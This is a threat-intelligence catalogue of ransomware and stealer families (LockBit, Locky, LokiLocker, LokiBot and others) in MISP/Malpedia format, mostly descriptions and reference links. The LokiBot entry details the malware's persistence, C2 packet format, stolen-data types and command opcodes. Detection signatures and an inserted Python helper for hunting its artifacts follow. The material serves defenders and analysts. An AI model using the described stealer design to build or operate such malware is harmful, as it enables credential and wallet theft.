https://research.openanalysis.net/lobshot/bot/hvnc/triage/2023/07/16/lobshot.html

https://www.elastic.co/de/security-labs/elastic-security-labs-discovers-lobshot-malware

LockBit (Windows)

The tag is: misp-galaxy:malpedia="LockBit (Windows)"

LockBit (Windows) is also known as:

  • ABCD Ransomware

Table 3895. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/

https://www.prodaft.com/m/reports/LockBit_Case_Report_TLPWHITE.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers

https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker

https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/

https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/

https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/

https://twitter.com/MsftSecIntel/status/1522690116979855360

https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a

https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/

https://blog.cyble.com/2022/07/05/lockbit-3-0-ransomware-group-launches-new-version/

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html

https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html

https://www.youtube.com/watch?v=C733AyPzkoc

https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79

https://securelist.com/new-ransomware-trends-in-2022/106457/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html

https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware

https://www.glimps.fr/lockbit3-0/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://blog.lexfo.fr/lockbit-malware.html

https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html

https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/

https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022

https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/

https://www.ic3.gov/Media/News/2022/220204.pdf

https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack

https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf

https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities

https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md

https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions

https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit

https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/

https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511

https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques

https://github.com/prodaft/malware-ioc/tree/master/PTI-257

https://www.cisa.gov/sites/default/files/2023-06/aa23-165a_understanding_TA_LockBit_0.pdf

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt

https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/

https://ke-la.com/lockbit-2-0-interview-with-russian-osint/

https://asec.ahnlab.com/en/41450/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments

https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-2-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254421

https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/

https://www.connectwise.com/resources/lockbit-profile

https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/

https://resources.prodaft.com/wazawaka-report

https://security.packt.com/understanding-lockbit/

https://www.logpoint.com/en/blog/hunting-lockbit-variations-using-logpoint/

https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/

https://asec.ahnlab.com/ko/39682/

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/

https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/

https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom

https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511

https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

https://analyst1.com/ransomware-diaries-volume-1/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.seqrite.com/blog/indian-power-sector-targeted-with-latest-lockbit-3-0-variant/

https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

https://www.glimps.fr/dcouverte-dune-nouvelle-version-du-ramsomware-lockbit/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/

https://id-ransomware.blogspot.com/search?q=lockbit

https://github.com/EmissarySpider/ransomware-descendants

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html

https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/

https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool

https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/

https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants

https://www.netskope.com/blog/netskope-threat-coverage-lockbit

https://medium.com/s2wblog/quick-overview-of-leaked-lockbit-3-0-black-builder-program-880ae511d085

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets

https://securelist.com/crimeware-report-lockbit-switchsymb/110068/

https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/

https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve

https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/

https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/

https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://redcanary.com/blog/intelligence-insights-november-2021/

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor

https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/

https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/

https://www.dr.dk/nyheder/viden/teknologi/frygtede-skulle-lukke-alle-vindmoeller-nu-aabner-vestas-op-om-hacking-angreb

https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/

https://www.intrinsec.com/alphv-ransomware-gang-analysis

https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/

https://www.seqrite.com/blog/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/

https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1

https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/

https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/

https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/

https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/

https://unit42.paloaltonetworks.com/lockbit-2-ransomware/

https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://asec.ahnlab.com/en/35822/

https://intel471.com/blog/privateloader-malware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354

LockerGoga

According to Trend Micro, LockerGoga is a ransomware that has been used in multiple attacks, most notably against Altran Technologies and Norsk Hydro. It encrypts a range of documents and source code files, but certain versions had little to no whitelist that would protect important system files such as the Windows Boot Manager.

The tag is: misp-galaxy:malpedia="LockerGoga"

LockerGoga is also known as:

Table 3896. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://blog.talosintelligence.com/lockergoga/

https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf

https://www.abuse.io/lockergoga.txt

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/

https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/

https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/

https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/

https://www.youtube.com/watch?v=o6eEN0mUakM

LockFile

A ransomware first observed in July 2021.

The tag is: misp-galaxy:malpedia="LockFile"

LockFile is also known as:

Table 3897. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile

https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/

https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html

https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

https://news.sophos.com/en-us/2021/08/23/proxyshell-vulnerabilities-in-microsoft-exchange-what-to-do/

https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/

https://twitter.com/VirITeXplorer/status/1428750497872232459

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/

Locky

Locky is a high-profile ransomware family that first appeared in early 2016 and was observed being active until the end of 2017. It encrypts files on the victim system and demands a ransom in order to get the original files back. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.

The tag is: misp-galaxy:malpedia="Locky"

Locky is also known as:

Table 3898. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.locky

http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html

https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/

https://dissectingmalwa.re/picking-locky.html

https://vixra.org/pdf/2002.0183v1.pdf

http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html

https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/

https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf

https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html

https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/

https://intel471.com/blog/a-brief-history-of-ta505

Locky (Decryptor)

The tag is: misp-galaxy:malpedia="Locky (Decryptor)"

Locky (Decryptor) is also known as:

Table 3899. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor

Locky Loader

For lack of a better name, this is a VBS-based loader that was used at the beginning of 2018 to deliver win.locky.

The tag is: misp-galaxy:malpedia="Locky Loader"

Locky Loader is also known as:

Table 3900. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader

Loda

Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.

The tag is: misp-galaxy:malpedia="Loda"

Loda is also known as:

  • LodaRAT

  • Nymeria

Table 3902. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.loda

https://blog.talosintelligence.com/attributing-yorotrooper/

https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html

https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/

https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/

https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware

https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/

https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html

https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html

https://blog.talosintelligence.com/get-a-loda-this/

https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA

https://www.silentpush.com/blog/more-lodarat-infrastructure-targeting-bangladesh-uncovered

LokiLocker

LokiLocker is a .NET ransomware, first seen in August 2021. This malware is protected with NETGuard (modified ConfuserEX) using the additional KoiVM virtualization plugin. The victims were observed to be scattered around the world, with the main concentration in Eastern Europe and Asia (BlackBerry).

The tag is: misp-galaxy:malpedia="LokiLocker"

LokiLocker is also known as:

Table 3908. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lokilocker

https://asec.ahnlab.com/en/52570/

https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware

https://www.theregister.com/2022/03/16/blackberry_lokilocker_ransomware/

https://www.msspalert.com/cybersecurity-research/lokilocker-ransomware-may-use-false-flag-to-avoid-identification/

Loki Password Stealer (PWS)

"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries it uses. While not all functions are hashed, the vast majority of them are.

Loki-Bot accepts a single argument/switch, ‘-u’, that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24 characters. For example: “B7E1C2CC98066B250DDB2123”.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th through 13th characters of the Mutex. For example: “%APPDATA%\C98066\”.

There can be four files within the hidden %APPDATA% directory at any given time: “.exe”, “.lck”, “.hdb” and “.kdb”. They will be named after characters 13 through 18 of the Mutex. For example: “6B250D”. Below is the explanation of their purpose:

  • .exe: A copy of the malware that will execute every time the user account is logged into

  • .lck: A lock file created when either decrypting Windows Credentials or keylogging, to prevent resource conflicts

  • .hdb: A database of hashes for data that has already been exfiltrated to the C2 server

  • .kdb: A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data.

The second packet transmitted by Loki-Bot contains decrypted Windows credentials.

The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version.

The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

BYTE / PAYLOAD TYPE

  • 0x26: Stolen Cryptocurrency Wallet

  • 0x27: Stolen Application Data

  • 0x28: Get C2 Commands from C2 Server

  • 0x29: Stolen File

  • 0x2A: POS (Point of Sale?)

  • 0x2B: Keylogger Data

  • 0x2C: Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

BYTE / INSTRUCTION DESCRIPTION

  • 0x00: Download EXE & Execute

  • 0x01: Download DLL & Load #1

  • 0x02: Download DLL & Load #2

  • 0x08: Delete HDB File

  • 0x09: Start Keylogger

  • 0x0A: Mine & Steal Data

  • 0x0E: Exit Loki-Bot

  • 0x0F: Upgrade Loki-Bot

  • 0x10: Change C2 Polling Frequency

  • 0x11: Delete Executables & Exit

Suricata Signatures (RULE SID / RULE NAME)

  • 2024311: ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected

  • 2024312: ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1

  • 2024313: ET TROJAN Loki Bot Request for C2 Commands Detected M1

  • 2024314: ET TROJAN Loki Bot File Exfiltration Detected

  • 2024315: ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1

  • 2024316: ET TROJAN Loki Bot Screenshot Exfiltration Detected

  • 2024317: ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2

  • 2024318: ET TROJAN Loki Bot Request for C2 Commands Detected M2

  • 2024319: ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
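The artifact-naming and HTTP payload rules described above, turned into hunting helpers as an added example (this is not code from the page, from Malpedia or from any of the referenced analysis tools). Assumed, because the text does not say: the Machine GUID is hashed as its ASCII bytes, the two WORDs are little-endian, the Binary ID is NUL-terminated, and bytes 5 to 10 of the payload are left unspecified.

```python
"""Helpers derived from the Loki-Bot description: expected on-disk artifacts
from the mutex, and field decoding of the HTTP POST body (added example)."""
import hashlib
import struct

# Payload Type table from the description (second WORD of the HTTP payload).
PAYLOAD_TYPES = {
    0x26: "Stolen Cryptocurrency Wallet",
    0x27: "Stolen Application Data",
    0x28: "Get C2 Commands from C2 Server",
    0x29: "Stolen File",
    0x2A: "POS (Point of Sale?)",
    0x2B: "Keylogger Data",
    0x2C: "Screenshot",
}

EXPECTED_BINARY_ID = b"ckav.ru"  # the value the description calls typical
FILE_EXTENSIONS = (".exe", ".lck", ".hdb", ".kdb")


def mutex_from_machine_guid(machine_guid: str) -> str:
    """MD5 of the Machine GUID, upper-case hex, trimmed to 24 characters.

    Assumption (not stated on the page): the GUID string is hashed as its
    ASCII bytes, without braces or a terminating NUL.
    """
    digest = hashlib.md5(machine_guid.encode("ascii")).hexdigest().upper()
    return digest[:24]


def artifacts_from_mutex(mutex: str) -> dict:
    """Derive the hidden folder and file names Loki-Bot uses from its mutex.

    Folder name: characters 8 thru 13 of the mutex (1-indexed, inclusive);
    file base name: characters 13 thru 18. Both ranges reproduce the worked
    example in the text ("C98066" and "6B250D" for "B7E1C2CC98066B250DDB2123").
    """
    if len(mutex) != 24:
        raise ValueError("Loki-Bot mutex is 24 hex characters")
    folder = mutex[7:13]
    base = mutex[12:18]
    paths = [f"%APPDATA%\\{folder}\\{base}{ext}" for ext in FILE_EXTENSIONS]
    return {"mutex": mutex, "folder": folder, "base": base, "paths": paths}


def parse_loki_payload(body: bytes) -> dict:
    """Decode the fields the description names in a Loki-Bot HTTP POST body.

    WORD 1: version, WORD 2: payload type, byte 11 onward: Binary ID.
    Assumptions: WORDs are little-endian (x86 host order); the Binary ID is
    read up to the first NUL byte; bytes 5-10 are not described on the page
    and are skipped.
    """
    if len(body) < 11:
        raise ValueError("payload too short for the described header")
    version, ptype = struct.unpack_from("<HH", body, 0)
    binary_id = body[10:].split(b"\x00", 1)[0]
    return {
        "version": version,
        "payload_type": ptype,
        "payload_name": PAYLOAD_TYPES.get(ptype, f"unknown (0x{ptype:02X})"),
        "binary_id": binary_id.decode("latin-1"),
        # The text says a Binary ID other than "ckav.ru" is worth noting.
        "unusual_binary_id": binary_id != EXPECTED_BINARY_ID,
    }


# Constructed sample POST body (not a real capture): version 0x0012,
# type 0x2B (Keylogger Data), six unspecified bytes, then the Binary ID.
SAMPLE_BODY = struct.pack("<HH", 0x0012, 0x2B) + b"\x00" * 6 + b"ckav.ru\x00"

if __name__ == "__main__":
    info = artifacts_from_mutex("B7E1C2CC98066B250DDB2123")
    for path in info["paths"]:
        print(path)
    print(parse_loki_payload(SAMPLE_BODY))
```

Feeding a host's real Machine GUID to mutex_from_machine_guid and checking the resulting %APPDATA% paths and mutex name is a quick triage step; the payload decoder gives the same classification the ET rule names encode.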

The tag is: misp-galaxy:malpedia="Loki Password Stealer (PWS)"

Loki Password Stealer (PWS) is also known as:

  • Burkina

  • Loki

  • LokiBot

  • LokiPWS

Table 3909. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/

https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html

https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations/

https://ivanvza.github.io/posts/lokibot_analysis

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/

https://isc.sans.edu/diary/27282

https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-deep-analysis-of-a-recent-lokibot-attack.pdf

https://lab52.io/blog/a-twisted-malware-infection-chain/

https://github.com/R3MRUM/loki-parse

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.lac.co.jp/lacwatch/report/20220307_002893.html

https://www.youtube.com/watch?v=-FxyzuRv6Wg

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

http://reversing.fun/posts/2021/06/08/lokibot.html

https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://phishme.com/loki-bot-malware/

https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf

